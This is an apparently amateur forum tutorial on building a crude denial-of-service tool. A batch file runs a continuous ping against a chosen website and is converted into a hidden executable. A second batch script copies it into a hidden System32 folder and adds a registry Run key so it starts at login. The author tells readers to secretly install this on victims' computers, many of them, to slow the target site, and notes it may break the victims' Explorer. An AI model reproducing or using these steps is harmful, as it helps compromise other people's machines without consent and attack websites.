Ever wonder how you can perform a DOS (denial of service) that doesnt require any fancy code or what not? Well, here it is. You dont really have to learn any coding language to understand this, pretty much just copy and paste.
Perform DOS :surprised
Perform DOS :surprised
- Open up notepad. Type in (dont include quotes unless I say so)(I am a command prompt junkie :pleased: ) "ping -t www.yourtarget.com". Change yourtarget.com to whatever site you want to DOS.
- Save the file as "DOS.BAT".
- Run the file to test that it works. If you see the program pinging, like below, only on and on, than the program works.

- Make that a ghost EXE using the tool bat_to_exe from this site: http://www.f2ko.de/English/b2e/index.php
Make sure you check the box ghost app at the bottom - Open up notepad again. Type in the following:
MD C:\WINDOWS\SYSTEM32\PING
COPY DOS.EXE C:\WINDOWS\SYSTEM32\PING
cd C:\windows\system32
attrib ping +h /s /d
REG ADD HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v DOS /t REG_SZ /d C:\windows\system32\ping\dos.exe - Save that as Ping.bat. This is assuming your primary drive is the drive C:. You may want to leave this a BAT file for that reason.
- Put the DOS.exe and the Ping.bat into the same directory. You may want to create a new folder.
- Get that folder onto the vics computer or put it onto a usb and run from that on the vics comp. When done, run the ping.bat file. Logoff. WARNING: this may make explorer not start or start slowly, which is the reason for running on a vics computer.
- Run the ping.bat on a lot of computers, this will make the traffic for the site really slow or will run a DOS. Have fun!
ps this is the really hard way of doing it. You might want to get some software.



